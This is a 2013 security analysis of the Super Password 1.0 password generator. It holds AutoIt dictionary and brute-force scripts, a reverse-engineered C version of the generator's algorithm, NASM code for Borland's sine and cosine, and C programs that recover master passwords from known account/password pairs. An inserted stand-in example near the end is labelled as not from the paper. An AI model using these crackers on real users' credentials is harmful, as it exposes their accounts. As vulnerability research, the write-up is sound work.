
Analysis of Super Password 1.0

Bart Leppens, Anthony Piron

February 2013

1 What is Super Password

Super Password is a MS Windows application, written in 2000 by Yan QiQi and last updated September 2nd, 2010. The application lives as an icon in the system tray. It tries to solve the problem that we need to remember a different password for every account we create. It takes an account name and a master password as input and then, when the "generate" button is pushed, some magic happens: a unique password of 12 characters is generated. Every time you provide this master password in combination with an account name, the application regenerates the same password.

The help file of the application states: "You needn't worry about the security. The COA algorithm Super Password uses to generate account passwords is very very complex and strong. No one can break it." Let's see if that's true.

2 Blackbox Analysis

2.1 Blackbox characteristics

Super Password has some weird behavior and some strange characteristics. The resulting password is not affected by:

• providing the master password in uppercase or in lowercase.

• providing the account name in uppercase or in lowercase.

• adding special characters (like é, @, ç, ...) to the master password.

• adding special characters to the provided account name.

The range of allowed characters is thus limited to a-z0-9. The resulting password always consists of 12 characters from this same range: a-z0-9. Theoretically, the super password must consist of at least 4 characters and the account name of at least 3 characters. This limitation is only enforced by the GUI: if the input consists entirely of special characters, the statement no longer holds, and there can even be no effective master password at all (e.g. @&|$). There doesn't seem to be a limit on the maximum length, but the more characters provided, the longer it seems to take to calculate the password.

2.2 Blackbox attacking

Suppose we have the credentials of one of the accounts (account name and corresponding password). Then we can try to brute force the master password, or we can use a wordlist and test whether the master password is on the list. One way of doing this is with a scripting language called AutoIt. The following scripts are written for AutoIt v3.

    WinWaitActive("Super Password 1.0")

    ; We search the master password which gives "b3daeu6zlcl4"
    ; for account name "myaccount"
    $capturedpassword = "b3daeu6zlcl4"
    $accountname = "myaccount"

    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:3]", "myaccount")

    Local $file = FileOpen("wordlist.lst", 0)
    If $file = -1 Then
        MsgBox(0, "Error", "Unable to open file")
        Exit
    EndIf

    While 1
        Local $line = FileReadLine($file)
        If @error = -1 Then ExitLoop
        ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:4]", $line)
        ControlClick("Super Password 1.0", "", "[CLASS:TButton; INSTANCE:1]")
        $a = ControlGetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:2]")
        If $a == $capturedpassword Then
            While (True)
                MsgBox(0, "", $line, 1)
                Sleep(1000)
            WEnd
            Exit
        EndIf
    WEnd

This way we were able to test about 4000 passwords per minute on an AMD Turion 64 X2 Mobile 1.8GHz system. When performing a brute force attack on the master password we can use the following algorithm:

    WinWaitActive("Super Password 1.0")

    ; We search the master password which gives "5xl2sdc0idf9"
    ; for account name "myaccount"
    $capturedpassword = "5xl2sdc0idf9"
    $accountname = "myaccount"
    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:3]", $accountname)

    $String = "a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & ",0,1,2,3,4,5,6,7,8,9"
    $String = StringSplit($String, ",")
    For $i = 1 To $String[0] Step +1
        For $i1 = 1 To $String[0] Step +1
            For $i2 = 1 To $String[0] Step +1
                For $i3 = 1 To $String[0] Step +1
                    ; $candidate: the 4-character master password under test
                    $candidate = $String[$i] & $String[$i1] & $String[$i2] & $String[$i3]
                    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:4]", $candidate)
                    ControlClick("Super Password 1.0", "", "[CLASS:TButton; INSTANCE:1]")
                    $a = ControlGetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:2]")
                    If $a == $capturedpassword Then
                        While (True)
                            MsgBox(0, "", $candidate, 1)
                            Sleep(1000)
                        WEnd
                        Exit
                    EndIf
                Next
            Next
        Next
    Next

With only 4000 keys a minute, breaking even a 4-character master password would take us almost 7 hours (36^4 / (4000 * 60) hours).

3 Whitebox Analysis

3.1 Modifying the original binary

When looking at the application with a debugger, we can see that there are some interesting addresses:

• 0x004022AA: calls the start of password generation which is located at 0x0040179C

• 0x00402474 → 0x0040264B: the application's help function

It is clear that we can easily replace the application's help function with our own assembly: we have 471 bytes of space. So basically, we can add our own custom brute force code and start the attack with a push on the help button. We are not sharing this code here, since we reused a part of the original Super Password assembly and this might infringe copyright. It now takes about 2 minutes to brute force a 4-character super password on an AMD Turion 64 X2 Mobile 1.8GHz system. That is 14000 keys a second. Multiple binaries can be generated which each contain part of the workload. So, if multiple processes can be started, e.g. on a 12-core system, it will only take seconds to test the same 4-character space. But the time needed to brute force is multiplied by 36 every time you add an additional character to the super password.

3.2 Reversing the algorithm

3.2.1 The algorithm in C

When looking at Super Password's address 0x0040179C and following the assembly further down, we can deduce the algorithm. First there is the conversion from uppercase to lowercase. We can see that special characters are simply skipped. The algorithm first takes every character of the provided super password into account and then proceeds with every character of the provided account name. Then the algorithm takes the result modulo 36, which is translated back into an ASCII character in the range a-z0-9. This translation is in fact a simple offset. For each of the 12 resulting characters this sequence is repeated, but every time the index of the resulting character is taken into account in the calculations. Provided with only valid characters (a-z0-9), we can translate the algorithm to this C99 implementation:

    #include <stdio.h>
    #include <stdint.h>

    double borlandsin(double angle);
    double borlandcos(double angle);

    int CalculateLetter(char *the_superpwd, char *the_username, int the_index)
    {
        uint32_t result = 0;
        double d = 0.0;

        // for each character of the master password
        for (char *ptr = the_superpwd; *ptr; ptr++) {
            char a = *ptr;
            // multiply the ascii code of the character with 654321
            // and add to the result
            result += (uint32_t)a * 654321;
            // calculate a cosine of the result and multiply with
            // (the index of the resulting character * 123456 + 987654321)
            d = borlandcos(result) * (the_index * 123456 + 987654321);
            // cast back to 32-bit unsigned integer value (via int64_t, so a
            // negative value wraps modulo 2^32 instead of being undefined)
            // this is the new value for result
            result = (uint32_t)(int64_t)d;
        }

        // for each character of the username
        for (char *ptr = the_username; *ptr; ptr++) {
            char a = *ptr;
            // multiply the ascii code of the character with 123456
            // and add to the result
            result += (uint32_t)a * 123456;
            // calculate a sine of the result and multiply with
            // (the index of the resulting character * 654321 + 123456789)
            d = borlandsin(result) * (the_index * 654321 + 123456789);
            // cast back to 32-bit unsigned integer value
            // this is the new value for result
            result = (uint32_t)(int64_t)d;
        }

        int reschar = result % 36; // result modulo 36
        if (reschar < 10) {
            reschar += 48; // convert back to ascii character 0..9
        } else {
            reschar += 87; // convert back to ascii character a..z
        }
        return reschar; // ascii character in range of 0-9a-z
    }

    int main(void)
    {
        char superpwd[] = "yanqiqi"; // the master password
        char username[] = "yanqiqi"; // the username
        int letter = 0;

        // generate and print all 12 characters of the corresponding password
        for (int i = 0; i < 12; i++) {
            letter = CalculateLetter(superpwd, username, i);
            printf("%c", letter);
        }
        printf("\n");
        return 0;
    }

3.2.2 Reflections on the algorithm

The algorithm calculates the resulting 12 characters one at a time. So when the first calculated character does not correspond with the desired result, we can already proceed to the next candidate (in both the brute force and the dictionary attack). The first part, which processes the provided super password, can be precalculated for all 12 characters (= indexes). For the second part, which uses the username, we can calculate for each of the 12 characters (= indexes) all possible constants that give us the resulting letter. The algorithm uses 32-bit unsigned integers in its calculation. These integers are multiplied by sines and cosines. Super Password was compiled with Borland Delphi 4.1. Delphi makes use of the x87 FPU for the calculation of these sines and cosines, but the instructions fsin and fcos are not used to generate them. The returned value is specific to the Borland implementation; it contains a certain imprecision. Since the resulting sines and cosines are multiplied with large uint32_t values (unsigned dwords), the result cannot be simulated using a library like <math.h>. Assume a cosine of 4242011732 that gives a value of 0.3186359445366380254 in Delphi and a value of 0.3186359446060212374 with <math.h> and with the fcos instruction. When you multiply for example 987777777 with these values, the values after casting back to uint32_t differ: casting 314741504.966 results in 314741504 (Delphi) but casting 314741505.0352 results in 314741505 (fcos). Increasing the accuracy does not help us here; Super Password relies on the Borland implementation of cosine and sine. This makes the algorithm non-portable.

3.2.3 The Borland sine and cosine with Nasm

We have written a small Delphi program and extracted the assembly. We used the addresses of Super Password as labels to help matching with the original executable binary.

    section .data
    ; PI divided by 4
    piBy4: DB 0x35, 0xC2, 0x68, 0x21, 0xA2, 0xDA, 0x0F, 0xC9, 0xfe, 0x3f, 0x35, 0xC2
    nan:   DD 0x0FFC04200

    section .text
    ; leading underscore: MinGW's C symbol decoration for borlandsin/borlandcos
    global _borlandsin
    global _borlandcos

    _borlandsin:
        PUSH EBP
        MOV EBP, ESP
        FINIT
        FLD QWORD [EBP+8]
        MOV CL, 0
        JMP spw00434516

    _borlandcos:
        PUSH EBP
        MOV EBP, ESP
        FINIT
        FLD QWORD [EBP+8]
        MOV CL, 2

    spw00434516:
        FXAM
        SUB ESP, 4
        WAIT
        FSTSW WORD [ESP]
        WAIT
        MOV AH, BYTE [ESP+1]
        SAHF
        JC spw00434534
        JNZ spw00434553
        JMP spw0043454E

    spw00434534:
        JZ spw00434542
        JNP spw00434542
        FSTP ST0
        FLD DWORD [nan]
        FTST

    spw00434542:
        JMP spw0043454E

    spw00434544:
        FCOMPP
        FLD DWORD [nan]
        FTST

    spw0043454E:
        JMP spw004345EA

    spw00434553:
        FABS
        FLD TWORD [piBy4]
        FXAM
        FXCH
        FPREM
        MOV CH, 2
        AND CH, AH
        SHR CH, 1
        FSTSW WORD [ESP]
        WAIT
        MOV AH, BYTE [ESP+1]
        SAHF
        JP spw00434544
        MOV AL, 3
        AND AL, AH
        SHL AH, 1
        SHL AH, 1
        RCL AL, 1
        ADD AL, 0FCh
        RCL AL, 1
        CMP CL, 2
        JNE spw0043458A
        ADD AL, CL
        MOV CH, 0

    spw0043458A:
        AND AL, 7
        TEST AL, 1
        JZ spw00434594
        FSUB
        JMP spw00434596

    spw00434594:
        FSTP ST1

    spw00434596:
        FPTAN
        TEST AL, 3
        JPE spw004345A3
        FXCH

    spw004345A3:
        FLD ST1
        FMUL ST0, ST0
        FXCH
        FMUL ST0, ST0
        FADD
        FSQRT
        SHR AL, 1
        SHR AL, 1
        XOR AL, CH
        JZ spw004345B9
        FCHS

    spw004345B9:
        FDIV
        JMP spw004345EA

    spw004345EA:
        ADD ESP, 4
        LEAVE
        RETN

Built with NASM version 2.10.06 on Windows XP:

    nasm -f win32 borlandsincos.nasm -o borlandsincos.obj

And then the C code was compiled and linked with gcc version 3.4.5 on Windows XP (MinGW):

    gcc spw.c borlandsincos.obj -std=c99 -o spw.exe

An alternative method that can be used is lookup tables. In double precision, each sine or cosine takes up exactly 8 bytes. So 32 GB (= 2^32 * 8 bytes) for all possible sines and another 32 GB for all possible cosines. In this way no FPU calculations are needed.

3.3 Attack on the reversed algorithm

3.3.1 Known-plaintext attack with multiple samples

When the attacker has about 6 combinations of account names and the corresponding passwords, we can derive, for each index, a set of constants that will replace the master password. Consider the following master password "zfghijklooz57o8zzzvbfaaqdiu6875433" and the corresponding pairs of account name and generated password: ("azerty", "bqzlxi4hwwrl"), ("abc", "0rrlo5tglzvg"), ("mail", "9m0u7ua78k3q"), ("webshop", "odtp5udarw66"), ("yanqiqi", "y3te20uwsl2u"), ("intranet", "8wb4dyrwh2h8"). We can calculate the constants for each index with the following C99 implementation:

    #include <stdio.h>
    #include <stdint.h>

    double borlandsin(double angle);

    uint64_t hit = 0, miss = 0;

    // create caching for sine calculation
    #define SIN_SIZE (1 << 26)
    struct {
        uint32_t x;
        double sin;
    } hsin[SIN_SIZE];

    static inline double
    mysin(uint32_t x)
    {
        uint32_t h = x % SIN_SIZE;

        if (hsin[h].x == x) // verify if sine in cache is sine for value x
            return hsin[h].sin;

        // else calculate sine for value x and place in cache
        hsin[h].x = x;
        hsin[h].sin = borlandsin(x);

        return hsin[h].sin;
    }

    static inline int
    CalculateLetter(uint32_t cst, char *the_username, int the_index)
    {
        uint32_t result = cst;
        double d = 0.0;

        // for each character of the username
        for (char *ptr = the_username; *ptr; ptr++) {
            char a = *ptr;
            // multiply the ascii code of the character with 123456
            // and add to the result
            result += (uint32_t)a * 123456;
            // calculate a sine of the result and multiply with
            // (the index of the resulting character * 654321 + 123456789)
            d = mysin(result) * (the_index * 654321 + 123456789);
            // cast back to 32-bit unsigned integer value (via int64_t, so a
            // negative value wraps modulo 2^32 instead of being undefined)
            // this is the new value for result
            result = (uint32_t)(int64_t)d;
        }

        int reschar = result % 36; // result modulo 36
        if (reschar < 10) {
            reschar += 48; // convert back to ascii character 0..9
        } else {
            reschar += 87; // convert back to ascii character a..z
        }
        return reschar; // ascii character in range of 0-9a-z
    }

    uint32_t
    searchCst(char *clt_log[], char *clt_pwd[],
              uint32_t from, uint32_t to, int index)
    {
        uint32_t i = from;

        while (1) {
            char **pl = clt_log;
            char **pd = clt_pwd;
            int found = 1;

            for (; *pl; pl++, pd++) {
                int letter = CalculateLetter(i, *pl, index);
                // if for one of the provided usernames the calculated character
                // does not correspond with the provided character of the password
                // we can break and proceed with verifying the next constant candidate
                if ((*pd)[index] != letter) { found = 0; break; }
            }

            if (found) {
                printf("Res: %u\n", i); // candidate constant for "index" found
            }

            if (i % 0xFFFFFFFul == 0) // display some progress
                printf("I: %08x\n", i);

            if (i++ == to) // increment i till maximum value (=to)
                break;
        }
        return 0;
    }

    /*
    ("azerty", "bqzlxi4hwwrl"), ("abc", "0rrlo5tglzvg"), ("mail", "9m0u7ua78k3q"),
    ("webshop", "odtp5udarw66"), ("yanqiqi", "y3te20uwsl2u"), ("intranet", "8wb4dyrwh2h8")
    */
    int main(void)
    {
        // list with all known logins
        // and a list with all corresponding passwords
        char *clt_log[] = {"azerty", "abc", "mail",
                           "webshop", "yanqiqi", "intranet", NULL};
        char *clt_pwd[] = {"bqzlxi4hwwrl", "0rrlo5tglzvg", "9m0u7ua78k3q",
                           "odtp5udarw66", "y3te20uwsl2u", "8wb4dyrwh2h8", NULL};

        // clear the cache
        for (uint32_t i = 0; i < SIN_SIZE; i++) {
            hsin[i].x = 0;
            hsin[i].sin = 0;
        }

        // parameter1: list of known logins
        // parameter2: list of corresponding passwords
        // parameter3: start of range in which to search constants
        // parameter4: end of range in which to search constants
        // parameter5: search constants for index (0..11)
        searchCst(clt_log, clt_pwd, 0x0ul, 0xFFFFFFFFul, 10);

        return 0;
    }

For each index this gives us the following constants:

• index0: 155016602, 573820617, 985378604, 2704508381, 3123312396, 3534870383

• index1: 1047828493, 3597320272

• index2: 1100035586, 3649527365

• index3: 1553765556, 4053351770, 4103257335

• index4: 289936959, 701494946, 1113052933, 1524610920, 2839428738, 3250986725, 3662544712, 4074102699

• index5: 851594859, 1263152846, 1674710833, 2086268820

• index6: 833806284, 1245364271, 1710109732, 3383298063, 3794856050, 4259601511

• index7: 28064626, 774212545, 1157763239, 1185770532, 1754440431, 2165998418, 2577556405, 3323704324, 3735262311

• index8: 757253385, 1168811372, 2973540570, 3306745164, 3718303151

• index9: 856489889, 3405981668

• index10: 557930578, 969488565, 3107422357, 3518980344

• index11: 184071555, 595629542, 880689466, 1292247453, 1703805440, 1910447360, 2322005347, 2733563334, 3145121321, 3430181245, 3841739232, 4253297219

For account name "administrator" these constants result in the following characters:

• index0: g, t, t, g, t, t

• index1: 4, 4

• index2: w, w

• index3: g, 5, g

• index4: o, o, o, o, o, o, o, o

• index5: x, x, x, x

• index6: w, w, g, w, w, g

• index7: u, h, j, h, u, u, u, h, h

• index8: 9, 9, 1, 9, 9

• index9: n, n

• index10: y, y, y, y

• index11: n, n, l, l, l, n, n, n, n, l, l, l


The space in which we need to search the password is heavily reduced. For username "administrator", the list of possible passwords using the constants found per index is limited to only 96 candidates:

    g4wgoxwu9nyn, g4wgoxwu9nyl, g4wgoxwu1nyn, g4wgoxwu1nyl, g4wgoxwh9nyn,
    g4wgoxwh9nyl, g4wgoxwh1nyn, g4wgoxwh1nyl, g4wgoxwj9nyn, g4wgoxwj9nyl,
    g4wgoxwj1nyn, g4wgoxwj1nyl, g4wgoxgu9nyn, g4wgoxgu9nyl, g4wgoxgu1nyn,
    g4wgoxgu1nyl, g4wgoxgh9nyn, g4wgoxgh9nyl, g4wgoxgh1nyn, g4wgoxgh1nyl,
    g4wgoxgj9nyn, g4wgoxgj9nyl, g4wgoxgj1nyn, g4wgoxgj1nyl, g4w5oxwu9nyn,
    g4w5oxwu9nyl, g4w5oxwu1nyn, g4w5oxwu1nyl, g4w5oxwh9nyn, g4w5oxwh9nyl,
    g4w5oxwh1nyn, g4w5oxwh1nyl, g4w5oxwj9nyn, g4w5oxwj9nyl, g4w5oxwj1nyn,
    g4w5oxwj1nyl, g4w5oxgu9nyn, g4w5oxgu9nyl, g4w5oxgu1nyn, g4w5oxgu1nyl,
    g4w5oxgh9nyn, g4w5oxgh9nyl, g4w5oxgh1nyn, g4w5oxgh1nyl, g4w5oxgj9nyn,
    g4w5oxgj9nyl, g4w5oxgj1nyn, g4w5oxgj1nyl, t4wgoxwu9nyn, t4wgoxwu9nyl,
    t4wgoxwu1nyn, t4wgoxwu1nyl, t4wgoxwh9nyn, t4wgoxwh9nyl, t4wgoxwh1nyn,
    t4wgoxwh1nyl, t4wgoxwj9nyn, t4wgoxwj9nyl, t4wgoxwj1nyn, t4wgoxwj1nyl,
    t4wgoxgu9nyn, t4wgoxgu9nyl, t4wgoxgu1nyn, t4wgoxgu1nyl, t4wgoxgh9nyn,
    t4wgoxgh9nyl, t4wgoxgh1nyn, t4wgoxgh1nyl, t4wgoxgj9nyn, t4wgoxgj9nyl,
    t4wgoxgj1nyn, t4wgoxgj1nyl, t4w5oxwu9nyn, t4w5oxwu9nyl, t4w5oxwu1nyn,
    t4w5oxwu1nyl, t4w5oxwh9nyn, t4w5oxwh9nyl, t4w5oxwh1nyn, t4w5oxwh1nyl,
    t4w5oxwj9nyn, t4w5oxwj9nyl, t4w5oxwj1nyn, t4w5oxwj1nyl, t4w5oxgu9nyn,
    t4w5oxgu9nyl, t4w5oxgu1nyn, t4w5oxgu1nyl, t4w5oxgh9nyn, t4w5oxgh9nyl,
    t4w5oxgh1nyn, t4w5oxgh1nyl, t4w5oxgj9nyn, t4w5oxgj9nyl, t4w5oxgj1nyn,
    t4w5oxgj1nyl

The more combinations of usernames and passwords are given, the fewer possible constants are found, and so the more the list of possible master passwords is reduced.

3.3.2 Brute force attack of the master password

Now that we have seen the algorithm of Super Password, we are not sure that there won't be any collisions. So we can search for a "candidate" master password. Assume the following C99 implementation:

    #include <stdio.h>
    #include <stdint.h>
    #include <time.h>

    double borlandsin(double angle);
    double borlandcos(double angle);

    // create caching for sine calculation
    #define SIN_SIZE (1 << 23)
    struct {
        uint32_t x;
        double sin;
    } hsin[SIN_SIZE];

    static inline double
    mysin(uint32_t x)
    {
        uint32_t h = x % SIN_SIZE;

        if (hsin[h].x == x) // verify if sine in cache is sine for value x
            return hsin[h].sin;

        // else calculate sine for value x and place in cache
        hsin[h].x = x;
        hsin[h].sin = borlandsin(x);

        return hsin[h].sin;
    }

    // create caching for cosine calculation
    #define COS_SIZE (1 << 23)
    struct {
        uint32_t x;
        double cos;
    } hcos[COS_SIZE];

    static inline double
    mycos(uint32_t x)
    {
        uint32_t h = x % COS_SIZE;

        if (hcos[h].x == x) // verify if cosine in cache is cosine for value x
            return hcos[h].cos;

        // else calculate cosine for value x and place in cache
        hcos[h].x = x;
        hcos[h].cos = borlandcos(x);

        return hcos[h].cos;
    }

    static inline int
    CalculateLetter(char *the_superpassword, char *the_username, int the_index)
    {
        uint32_t result = 0;
        double d = 0.0;

        // for each character of the master password
        for (char *ptr = the_superpassword; *ptr; ptr++) {
            char a = *ptr;
            // multiply the ascii code of the character with 654321
            // and add to the result
            result += (uint32_t)a * 654321;
            // calculate a cosine of the result and multiply with
            // (the index of the resulting character * 123456 + 987654321)
            d = mycos(result) * (the_index * 123456 + 987654321);
            // cast back to 32-bit unsigned integer value (via int64_t, so a
            // negative value wraps modulo 2^32 instead of being undefined)
            // this is the new value for result
            result = (uint32_t)(int64_t)d;
        }

        // for each character of the username
        for (char *ptr = the_username; *ptr; ptr++) {
            char a = *ptr;
            // multiply the ascii code of the character with 123456
            // and add to the result
            result += (uint32_t)a * 123456;
            // calculate a sine of the result and multiply with
            // (the index of the resulting character * 654321 + 123456789)
            d = mysin(result) * (the_index * 654321 + 123456789);
            // cast back to 32-bit unsigned integer value
            // this is the new value for result
            result = (uint32_t)(int64_t)d;
        }

        int reschar = result % 36; // result modulo 36
        if (reschar < 10) {
            reschar += 48; // convert back to ascii character 0..9
        } else {
            reschar += 87; // convert back to ascii character a..z
        }
        return reschar; // ascii character in range of 0-9a-z
    }

    int main(void)
    {
        char *clt_log = "administrator";
        char *clt_pwd = "t4w5oxwh9nyl";

        // clear the caches
        for (uint32_t i = 0; i < SIN_SIZE; i++) {
            hsin[i].x = 0;
            hsin[i].sin = 0;
        }
        for (uint32_t i = 0; i < COS_SIZE; i++) {
            hcos[i].x = 0;
            hcos[i].cos = 0;
        }

    #define MAX_DEPTH 4 // depth of password to search for
        char spw[MAX_DEPTH + 2];
        for (int i = 0; i < MAX_DEPTH + 2; i++) {
            spw[i] = 0;
        }

        int depth = 0;
        int char_res = 0;

        double elapsed; // in seconds
        clock_t start, end;
        start = clock();

        // some simple brute force algorithm: spw is incremented like an
        // odometer over the alphabet 0-9a-z, growing by one position on carry
        while (depth < MAX_DEPTH + 1) {
            depth = 0;
            while (spw[depth] == 122) depth++;  // skip positions at 'z'
            if (spw[depth] == 57) {             // '9' -> 'a'
                spw[depth] = 97;
            } else if (spw[depth] < 48) {       // new position -> '0'
                spw[depth] = 48;
            } else {
                spw[depth]++;
            }
            int h = depth;
            while (h > 0) {                     // reset lower positions to '0'
                spw[h - 1] = 48;
                h--;
            }

            if (depth > 4) { // show some progress
                for (char *ptr = spw; *ptr; ptr++) {
                    char a = *ptr;
                    printf("%c", a);
                }
                printf("\n");
            }

            for (int i = 0; i < 12; i++) {
                char_res = CalculateLetter(spw, clt_log, i);
                // skip to next if not expected result
                if (char_res != clt_pwd[i]) break;
                if (i == 11) {
                    printf("found\n");
                    for (char *ptr = spw; *ptr; ptr++) {
                        char a = *ptr;
                        printf("%c", a);
                    }
                    printf("\n");
                }
            }
            depth++;
        }

        end = clock();
        elapsed = ((double)(end - start)) / CLOCKS_PER_SEC;
        printf("time: %f seconds\n", elapsed);

        return 0;
    }

Some of the calculated sines and cosines are cached in memory. It now takes about 15 seconds to brute force a 4-character super password on an AMD Turion 64 X2 Mobile 1.8GHz system using only one thread. That is more than 110,000 keys per second.

3.3.3 Optimisations of brute force attack

Multiple optimisations are possible. For each index, all possible constants can be precalculated, which avoids calculations with the account name when performing brute force or dictionary attacks (this can replace the second part of the COA algorithm). For each master password we want to test, we can (pre-)generate the constant for each of the 12 indexes. Then we can check whether these constants correspond with the precalculated possible constants. If they correspond for all 12 indexes, we have a candidate for the original super password. The calculation of these constants for each master password could be distributed, and lookup tables containing the constants for master passwords could be shared.
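As an added example (not code from the paper), the COA round written as the two stages that sections 3.2.2 and 3.3.3 propose to precalculate, with a check that the precalculated-constant path reproduces the single-pass form and that a wrong candidate is rejected at its first differing letter. Since section 3.2.2 shows the Borland sine and cosine cannot be reproduced with <math.h>, a labelled stand-in Taylor-series sine is assumed here; the generated letters therefore differ from Super Password's real output, but the stage separation holds for any choice of sine and cosine.

```c
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the Borland sine (an assumption, see 3.2.2): Taylor series
 * after integer range reduction. Only its range [-1, 1] matters here. */
static double approx_sin(double x)
{
    const double two_pi = 6.283185307179586;
    x -= (double)(int64_t)(x / two_pi) * two_pi;   /* now 0 <= x < 2*pi */
    double term = x, sum = x;
    for (int n = 1; n < 26; n++) {                  /* alternating x^(2n+1)/(2n+1)! */
        term *= -x * x / ((2.0 * n) * (2.0 * n + 1));
        sum += term;
    }
    return sum;
}
static double approx_cos(double x) { return approx_sin(x + 1.5707963267948966); }

/* Truncate toward zero and wrap modulo 2^32; going through int64_t avoids the
 * undefined behaviour of converting a negative double straight to uint32_t. */
static uint32_t wrap32(double d) { return (uint32_t)(int64_t)d; }

/* Stage 1 of the COA round: depends only on the master password and the
 * character index, so its 12 outputs can be stored and reused for every account. */
uint32_t master_stage(const char *superpwd, int index)
{
    uint32_t result = 0;
    for (const char *p = superpwd; *p; p++) {
        result += (uint32_t)(unsigned char)*p * 654321u;
        result = wrap32(approx_cos(result) * (double)(index * 123456 + 987654321));
    }
    return result;
}

/* Stage 2: mixes a stage-1 constant with the account name, then maps to a-z0-9. */
int account_stage(uint32_t cst, const char *username, int index)
{
    uint32_t result = cst;
    for (const char *p = username; *p; p++) {
        result += (uint32_t)(unsigned char)*p * 123456u;
        result = wrap32(approx_sin(result) * (double)(index * 654321 + 123456789));
    }
    int r = (int)(result % 36);
    return r < 10 ? r + '0' : r - 10 + 'a';
}

/* The 12 constants that replace the master password in later searches. */
void master_constants(const char *superpwd, uint32_t cst[12])
{
    for (int i = 0; i < 12; i++) cst[i] = master_stage(superpwd, i);
}

/* The paper's single-pass form, written out independently for comparison. */
int single_pass_letter(const char *superpwd, const char *username, int index)
{
    uint32_t result = 0;
    for (const char *p = superpwd; *p; p++) {
        result += (uint32_t)(unsigned char)*p * 654321u;
        result = wrap32(approx_cos(result) * (double)(index * 123456 + 987654321));
    }
    for (const char *p = username; *p; p++) {
        result += (uint32_t)(unsigned char)*p * 123456u;
        result = wrap32(approx_sin(result) * (double)(index * 654321 + 123456789));
    }
    int r = (int)(result % 36);
    return r < 10 ? r + 48 : r + 87;
}

/* 1 when the precalculated-constant path agrees with the single pass on all 12 letters. */
int two_stage_matches_single_pass(const char *superpwd, const char *username)
{
    uint32_t cst[12];
    master_constants(superpwd, cst);
    for (int i = 0; i < 12; i++)
        if (account_stage(cst[i], username, i) != single_pass_letter(superpwd, username, i))
            return 0;
    return 1;
}

/* Index of the first letter differing from target (12 = full match). A wrong
 * candidate is discarded after this many letters, hence the early break in the
 * paper's search loops. */
int first_mismatch(const uint32_t cst[12], const char *username, const char *target)
{
    for (int i = 0; i < 12; i++)
        if (account_stage(cst[i], username, i) != target[i]) return i;
    return 12;
}
```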

4 Conclusion

The COA algorithm is at least vulnerable to a known-plaintext attack. Super Password can easily be attacked with dictionaries as well. Brute forcing is also a problem for Super Password, since for each plaintext master password the corresponding constants can be precalculated, and this for each of the 12 indexes. When distributing the effort, lookup tables for very long master passwords could be generated, and thus Super Password is never a safe option. We strongly recommend not to use this piece of software anymore.

5 References

• http://www.softpedia.com/get/Security/Password-Managers-Generators/Super-Password.shtml

• http://www.nasm.us/

• http://www.ollydbg.de/
